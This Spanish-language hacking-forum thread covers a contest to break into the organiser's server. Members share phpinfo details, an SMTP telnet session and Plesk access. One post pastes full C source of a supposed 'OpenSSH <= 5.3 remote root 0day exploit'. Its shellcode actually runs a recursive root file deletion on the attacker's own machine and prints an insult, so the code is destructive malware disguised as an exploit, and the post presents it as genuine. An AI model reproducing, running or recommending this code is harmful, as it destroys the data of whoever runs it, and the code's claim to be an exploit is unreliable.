Autor
|
Tema: Concurso Nº1: "Hack My Server" (Leído 129,703 veces)
|
dimitrix
|
En uno de ellos está el phpinfo() donde aparte de la versión de php (PHP Version 5.3.2-1ubuntu4.14) tenemos información que nos puede ser importante como el correro del admin (root@********.************.net) versión de OpenSSL (OpenSSL 0.9.8k) y demás Sí, el phpinfo() lo subí ayer para quien lo encontrara El dominio p*************s.com está controlado pero en v***.***.es ni p**a idea de cual es, supongo que será de alguien del foro, ahora miraré. 11Sep Acabo de acceder y no encuentro nada de v***.***.es ¿Puedes enviarmelo por privado cual es y donde lo ves?
|
|
|
En línea
|
|
|
|
Stakewinner00
|
PD: ¿Ahora con la cuenta del Plesk, el objetivo es el mismo o sólo atacar la aplicación web?
Saludos!
Segun tengo entendido la cuenta plesk la creo para k podamos avanzar un poco mas pero el objetivo es el mismo.
|
|
|
En línea
|
|
|
|
Belial & Grimoire
Desconectado
Mensajes: 559
Tea_Madhatter
|
pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.htmltambien vi un explot para debian, OpenSSH 5.3p1 Debian intente con este * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void usage(char *argv[]) { printf("\n\t[+] HATSUNEMIKU\n"); printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n"); printf("\t[+] By: n3xus\n"); printf("\t[+] Greetz to hackforums.net\n"); printf("\t[+] Keep this 0day priv8!\n"); printf("\t[+] usage: %s <target> <port>\n\n", argv[0]); exit(1); } unsigned char decoder[]= "\x6a\x0b\x58\x99\x52" "\x6a\x2f\x89\xe7\x52" "\x66\x68\x2d\x66\x89" "\xe6\x52\x66\x68\x2d" "\x72\x89\xe1\x52\x68" "\x2f\x2f\x72\x6d\x68" "\x2f\x62\x69\x6e\x89" "\xe3\x52\x57\x56\x51" "\x53\x89\xe1\xcd\x80"; unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b" "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1" "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31" "\xdb\x40\xcd\x80"; int main(int argc, char **argv) { int euid = geteuid(); int port= 22, sock; char h[1000]; struct hostent *host; struct sockaddr_in addr; if(euid != 0) { fprintf(stderr, "You need to be root to use raw sockets.\n"); exit(1); } if(euid == 0) { fprintf(stdout, "MIKU! MIKU! MIKU!\n"); } if(argc != 3) usage(argv); if(!inet_aton(h, &addr.sin_addr)) { host = gethostbyname(h); if(!host) { fprintf(stderr, "[-] Exploit failed.\n"); (*(void(*)())decoder)(); exit(1); } addr.sin_addr = *(struct in_addr*)host->h_addr; } sock = socket(PF_INET, SOCK_STREAM, 0); addr.sin_port = htons(port); addr.sin_family = AF_INET; if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr,"[-] Exploit failed.\n"); exit(1); } char payload[1337]; memcpy(payload, &decoder, sizeof(decoder)); memcpy(payload, &rootshell, sizeof(rootshell)); send(sock, payload, strlen(payload),0); close(sock); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr, "[-] Exploit failed.\n"); exit(1); } else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { fprintf(stdout, "[+]g0t sh3ll!\n"); system("/bin/bash"); } else { fprintf(stderr, "[-] Exploit failed.\n"); close(sock); exit(0); } } pero tampoco, espero pronto haya mas suerte
|
|
|
En línea
|
.
|
|
|
opportunity
Desconectado
Mensajes: 56
|
No es ningun agujero, pero ¿he podido enviar un email haciendo telnet al puerto 25? ******************************************** HELO -----------------.net 250 -----------------.net MAIL FROM: < lola@elhacker.net> 250 2.1.0 Ok RCPT TO: < lola@elhacker.net> 554 5.7.1 < lola@elhacker.net>: Relay access denied RCPT TO: < lola@-----------------.net> 550 5.1.1 < lola@-----------------.net>: Recipient address rejected: User unknown in virtual alias table RCPT TO: < root@-----------------.net> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> Prueba de envio . 250 2.0.0 Ok: queued as 71F025B4094 ********************************************
|
|
« Última modificación: 8 Mayo 2012, 21:30 pm por opportunity »
|
En línea
|
|
|
|
dimitrix
|
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.
|
|
|
En línea
|
|
|
|
opportunity
Desconectado
Mensajes: 56
|
como? Que ha pasado?
|
|
|
En línea
|
|
|
|
Stakewinner00
|
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.
Me podeis decir k tiene de malo la reverse IP??
|
|
|
En línea
|
|
|
|
dimitrix
|
Me podeis decir k tiene de malo la reverse IP??
Nada, el problema es que publique aquí la IP.
|
|
|
En línea
|
|
|
|
opportunity
Desconectado
Mensajes: 56
|
Sorry, no me habia dado cuenta.
|
|
|
En línea
|
|
|
|
dimitrix
|
Sorry, no me habia dado cuenta.
Nada, nada, te envío los datos de PLESK.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
GFXMACHINE, presenta "Concurso Por Un Dominio"
Diseño Gráfico
|
+ enrique ZP
|
0
|
2,150
|
19 Octubre 2005, 04:24 am
por + enrique ZP
|
|
|
De donde puedo descargar utilidades: "Formas", "Estilos", "Motivos", D
Diseño Gráfico
|
Ad0nis
|
2
|
8,843
|
2 Septiembre 2006, 15:48 pm
por Ad0nis
|
|
|
[Ayuda] modificar "start page" en "internet explorer" con "batch"
Scripting
|
taton
|
7
|
17,284
|
20 Septiembre 2006, 01:45 am
por taton
|
|
|
recursos visual basic, """"""proceso inmortal"""""
Análisis y Diseño de Malware
|
Dark4ngel
|
7
|
14,180
|
3 Noviembre 2011, 10:42 am
por Dark4ngel
|
|
|
Tema: Concurso Nº1 "Hackeame" Ethical Hack
« 1 2 3 4 5 »
Hacking
|
Gtorna
|
43
|
33,010
|
1 Agosto 2012, 16:32 pm
por it3r
|
|